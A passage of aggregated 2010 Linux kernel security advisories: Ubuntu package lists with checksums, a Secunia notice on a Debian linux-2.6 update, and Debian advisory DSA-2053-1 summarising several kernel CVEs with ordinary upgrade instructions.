http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:    50056 08be19a737d5c6b1b99b21c072e28d75
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:   123832 091e7733c12a45745381b4fe35d3640b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:   124268 2e5ad0b6c7b80907a9927bb37446aa06
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:    15488 0afa442071262b64ba4fbfe594b44306
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:     5710 b999ccf838edc897b8874914e3f25148
http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:    20788 7140a98dd26b05e5278d938a02b9af4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:    20798 a2cab82a0956e6ec96375cd9f6e23a29

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   340852 5448ca0d59837472e8062a7758249b05
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   281626 20cdb99682c1f387eedd2dfdccc39c0b
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    60558 30fa795c08458a313f3a04c3ac06b833
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    68708 65c5e7b743e6e041e55ab080726e6326
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    48390 9d549e434d1f43ca803c400337537735
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    53128 e1b19e86e96b2a705f52257d0ba3e446
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    96780 69931c2ff42e93b841cbc39040b5f30b
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   109864 55530222d62b149471f8f7ec0a0b401c
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    41000 e504306368b70e7b1d4080fb9f104774
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    40386 867836bfd128cb699b6084d22ae5b9ba
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   598544 7c74713ce524ca6056f98b948ba1009d
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   631378 f6d7ccfc08940e0f182d7c347aa6fe1b
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   155250 5e58765f9014ac1b91db52377be3214e
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   150514 1c673dcbb00b8bdb03c140e2c16c1c0b
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   106286 f66ae752322b3a80afd81acce9678c54
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   110218 b81a7936f5d028e6e2d1b0c66ec67a82
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   418794 7614b2ba143ebc43a4df17d3a553f07c
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   355170 c461e16d2638bbd922ba08faa3aadb1f
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:  4184440 fcf9a52cf7d828353fc20fc42f04074e
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:  5568942 e1244e4847aa34cefffd29c5e69d17da
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc-smp_2.6.32-22.35_powerpc.deb
  Size/MD5:   834094 d2a5a47fe19b15efcbade3a458886100
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc64-smp_2.6.32-22.35_powerpc.deb
  Size/MD5:   853586 41d8ab0b3bac34b9ef18b3bd1751c06a
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc_2.6.32-22.35_powerpc.deb
  Size/MD5:   834092 e1e2aa29e1424aef7ee116b1aa782e44
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc-smp_2.6.32-22.35_powerpc.deb
  Size/MD5: 27690922 d93d95c548c34b5632bddc5f69e7c400
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc64-smp_2.6.32-22.35_powerpc.deb
  Size/MD5: 28531758 631a3347cb263b30bbac36ecfc73b928
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc_2.6.32-22.35_powerpc.deb
  Size/MD5: 27421200 9068bbc77af845ca5b609d63bacd3308
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_powerpc.deb
  Size/MD5:   760646 0e4b57d343052f30433529cbe14385ab
http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_powerpc.deb
  Size/MD5:   196496 08665e49676e012315b941d37f838812
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   289406 e171a625ccdacd6709fee1c6e116e3bf
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   310398 ac3b6dacc77e4002ca825e265bbedea2
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   221150 6a0092ae1be40ca9ee127b2232d15cb0
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   223804 af7ba0faf09abaf57945a5e7fc2ee506
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    31938 5101007b3b2c9c45eb839952ff705786
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    36496 5dbc40f2acca40498c173d0886f9c2fb
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   343926 8c91a96bd0c3c6cc134532d13fd3d37e
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   385810 4a30a8fe1a7d7c1367938575c185f169
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:  2173120 cb265da97dfe62f146fd1fe41ebfc1f9
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:  2372824 8525c63c57d9345520be8210544f214c
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   223066 00121583edd924fe1757fa727ce876f3
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   217338 72c2573434f500ed671fa00582074ca7
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   259842 55eca2948a90fd62fa2e4ff0a9af80c9
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   296094 bfda8ec67edf7abd1478a60b126995ac
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   131886 ad03d7e0dbe804de4593e2fb86ebc4d0
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   154672 b67bb554dccec4c27d6accfbc97de8e4
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    50974 ee184ba015afebe43b7d67545684a609
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    45510 62e72d83114e691e6644f77328eae811
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   108060 869c7fefad265a86e620a08b85dccca2
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   123884 14b554ea470bda34e64f0d1df7fc6516
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    84352 1f3ffcebad40e4289c58fb81aec0855e
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    89956 8f8f82acc6aad562a95d254c5fac022c
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    77236 e74748e50bc049e1ca8abd0babfcae76
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    28408 34f21190bd3bbd99cbcd25074d41faaa
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:     8958 91a68cc7a6fe6edf7ac0be03e165b4da
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    10186 b4b821de875ffd8607a5f867f42854cc
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    62110 8194a3936a0ec9bbdc1866f8201d7015
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    72518 009ef857c62f697f9ee69284634b274f
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   106886 da2d5917ae498c3078ebbd70ff3da14b
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   136600 e6165d5923d6aefd3f3398010ee23694
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:  1648486 4f570da059c50025d135c0e3f75ccd5e
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:  1575088 c836ac8e48f8d71fabddbba3b950c198
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    78218 eddd03eab6e34af5a232892afc3bca0a
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    83474 0ef56c605b39df3e5edfb67682ae2c06
http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    17454 c7dbbca300fc48245cd4cfcf51d5b35d
http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    18520 94418ced4448d327ec47dc602c17241a
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    67940 7a38341b4bc2c79511068590fc302c01
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    80278 e54c3d70347bae3108d67b1bc2bc4516
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   152200 1dc38fce24ffad9be140b3948e356e05
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   159704 c78e3cd87f71f9a728004fd7e546cb50
http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    22518 a83c7b1e9ffa2a3660bb41fbd3fcbaca
http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    25778 b7471dba3ec7b8c05d5ea5739933fe93

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   146488 3b7be44529c4cc86514657ac7b12b12b
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    71440 aad8b8756f92832f4febd71db1f966dd
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    47602 3db40ba1ebd556f46b88da6dbed5c5d3
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    98038 101ce2471c33a479cf85df2b2e2c5211
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   591060 cf8fb919251529d57a1f318311b3707a
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   151664 20c364a8b683a0c4ba27567503cf5296
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    99356 e0c14c26cb974c7825f345cd70429841
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:  3186134 44a50ae97caf252433b0ecfac295ec59
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-sparc64-smp_2.6.32-22.35_sparc.deb
  Size/MD5:   652300 cd39dcccee9c7a771274cdf208530af6
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-sparc64_2.6.32-22.35_sparc.deb
  Size/MD5:   651290 f71657ec5a90274fe87615325f631740
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-sparc64-smp_2.6.32-22.35_sparc.deb
  Size/MD5: 22598018 851cda52ff2ffdd88b0732c63f74b5c8
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-sparc64_2.6.32-22.35_sparc.deb
  Size/MD5: 22149494 2e6f4fc8428d316ccf24367738ec4cdb
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_sparc.deb
  Size/MD5:   771020 0f4a6d78f1bfc4c66dec85397a1dfe38
http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_sparc.deb
  Size/MD5:   198080 42b0b00c0a74c8f19e63959105f8312f
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   280878 fd57b5da83294769b64c507d1819bf0e
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   214702 5aacff2a187543bc7c03d401f68607be
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    31894 37e7ede984e9a95085fef957bd24f9d3
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   337020 a60a63332965ca2e7eb04b9e5af55555
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:  1765768 473b47001814ec3dcfe3f7d13b591ddf
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   246854 4fcf74412f97aaad8445b41a8568ed9d
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   139988 d2f75d8b75b929fbf9220da8bdf7e589
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    39912 a365983317c1b3c4dda94e11903aff3b
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   206902 462e5550a90007c8c5418938dd676f6b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:     9178 c9f2992677c044041a448845a7d38b11
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    64466 52cf00bc003b8b5701298fad5517731f
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   212946 fbbb948d246dbea1ce131546d8bf6c2e
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:  1272618 4aec314341cdc776f20508b90866f5ae
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    96624 f0995ec49806ff5ede44bd80ff510d6e
http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    17702 9eb7b43e2289a69f9dcd478a5dc8d754
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   208204 b7724ff354d34b60cf7e2c5f50e61637
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   193306 12a8a53ca0ef921b491d73d2bc051f73
http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    27206 6ae9400c4f74471e4b0baa8e12220191

. ----------------------------------------------------------------------

Get a tax break on purchases of Secunia Solutions!

If you are a U.S. company, you may be qualified for a tax break for your software purchases. ----------------------------------------------------------------------

Stay Compliant

Alerts, Technical Descriptions, PoC, Links to patches, CVSS, CVE, Changelogs, Alternative Remediation Strategies, and much more provided in the Secunia Vulnerability Intelligence solutions

Free Trial http://secunia.com/products/corporate/evm/trial/


TITLE: Debian update for linux-2.6

SECUNIA ADVISORY ID: SA39830

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/39830/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=39830

RELEASE DATE: 2010-05-26

DISCUSS ADVISORY: http://secunia.com/advisories/39830/#comments

AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)

http://secunia.com/advisories/39830/

ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS

https://ca.secunia.com/?page=viewadvisory&vuln_id=39830

ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING

http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

DESCRIPTION: Debian has issued an update for linux-2.6.

5) The "nfs_release_request()" function in fs/nfs/pagelist.c can be interrupted, which can be exploited to e.g. cause a NULL pointer dereference by killing an application while it performs certain actions on an NFS file.

Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

PROVIDED AND/OR DISCOVERED BY: Debian credits: 1) Chris Guo from Nokia China and Jukka Taimisto and Olli Jarva from Codenomicon Ltd. 2) Neil Hormon 3) Wufei 4) Sachin Prabhu 5) Trond Myklebust

ORIGINAL ADVISORY: DSA 2053-1: http://lists.debian.org/debian-security-announce/2010/msg00096.html

OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


. Fixes for CVE-2010-0419 caused failures when using KVM in certain situations. This update reverts that fix until a better solution can be found.

We apologize for the inconvenience. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA-2053-1 security@debian.org http://www.debian.org/security/ dann frazier May 25, 2010 http://www.debian.org/security/faq


Package : linux-2.6 Vulnerability : privilege escalation/denial of service/information leak Problem type : local Debian-specific: no CVE Id(s) : CVE-2009-4537 CVE-2010-0727 CVE-2010-1083 CVE-2010-1084 CVE-2010-1086 CVE-2010-1087 CVE-2010-1088 CVE-2010-1162 CVE-2010-1173 CVE-2010-1187 CVE-2010-1437 CVE-2010-1446 CVE-2010-1451 Debian Bug(s) : 573071

Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or privilege escalation.

CVE-2010-0727

Sachin Prabhu reported an issue in the GFS2 filesystem.

CVE-2010-1083

Linus Torvalds reported an issue in the USB subsystem, which may allow
local users to obtain portions of sensitive kernel memory.

CVE-2010-1087

Trond Myklebust reported an issue in the NFS filesystem. This has an unknown
security impact.

CVE-2010-1173

Chris Guo from Nokia China and Jukka Taimisto and Olli Jarva from
Codenomicon Ltd reported an issue in the SCTP subsystem that allows
a remote attacker to cause a denial of service using a malformed init
package.

CVE-2010-1187

Neil Hormon reported an issue in the TIPC subsystem.

CVE-2010-1437

Toshiyuki Okajima reported a race condition in the keyring subsystem.

CVE-2010-1446

Wufei reported an issue with kgdb on the PowerPC architecture,
allowing local users to write to kernel memory. Note: this issue
does not affect binary kernels provided by Debian. The fix is
provided for the benefit of users who build their own kernels
from Debian source.

CVE-2010-1451

Brad Spengler reported an issue on the SPARC architecture that allows
local users to execute non-executable pages. See the referenced Debian bug page for details.

For the stable distribution (lenny), these problems have been fixed in version 2.6.26-22lenny1.

We recommend that you upgrade your linux-2.6 and user-mode-linux packages.

The following matrix lists additional source packages that were rebuilt for compatibility with or to take advantage of this update:

                                         Debian 5.0 (lenny)
 user-mode-linux                         2.6.26-1um-2+22lenny1

Upgrade instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get upgrade will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny


Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-22lenny1.dsc Size/MD5 checksum: 5778 713b8a3f2bc10816264a81c0a9eb7860 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-22lenny1.diff.gz Size/MD5 checksum: 7894925 86ecf2ca8808aea84b0af06317616a6c

Architecture independent packages:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-22lenny1_all.deb Size/MD5 checksum: 126228 be9c5c392a1ab0cf0a297063abf983f6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-22lenny1_all.deb Size/MD5 checksum: 1764832 b0d63ac0b12a0679867b8b53bf4c3a54 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-22lenny1_all.deb Size/MD5 checksum: 2871892 c5c0e0d8ea193812566f9481e6ca8440 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-22lenny1_all.deb Size/MD5 checksum: 48764508 9a203c801fd068d282d1cbb11fbab68f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-22lenny1_all.deb Size/MD5 checksum: 4627886 fe792ad0bcf2c9f8ac4bb496e9885a20 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-22lenny1_all.deb Size/MD5 checksum: 110906 6ef2c4468e55570a3e571021299d4760

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 374304 046703c72d1bf6bcc81cb462e0f4d7ec http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 372708 a6922d1de2035d2745d5ad56a6e38eb9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 28676342 687312e7cdf46a79c7c4b974cbe5b542 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 3620318 4c7448f11e8a63ddec95b7ddaf6e9c02 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 29374588 452a568c8f74d69e3b7ba6e1685d4863 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 373176 fbda1e3fb70a213ee26ab4e0a5af16a7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 110428 